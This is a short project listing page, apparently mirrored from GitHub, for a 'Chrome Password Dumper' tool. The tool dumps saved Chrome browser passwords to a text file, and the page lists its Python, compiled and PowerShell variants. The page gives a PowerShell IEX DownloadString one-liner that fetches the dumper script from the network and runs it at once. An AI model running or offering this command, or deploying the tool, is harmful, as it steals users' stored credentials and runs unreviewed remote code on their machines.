All Projects → roflsandwich → Chrome Password Dumper

roflsandwich / Chrome Password Dumper

Programming Languages

powershell
5483 projects

Chrome-Password-Dumper

For Windows version simply run chrome.exe to dump the passwords to a text file.

For powershell version:

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/roflsandwich/Chrome-Password-Dumper/master/chromev2.ps1')

Chrome must be closed before running the PoC

  • chrome.py uncompiled version

  • chrome.exe - compiled with py2exe

  • chrome.ps1 - powershell version

  • chromev2.ps1 - powershell version with a process check for chrome.

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].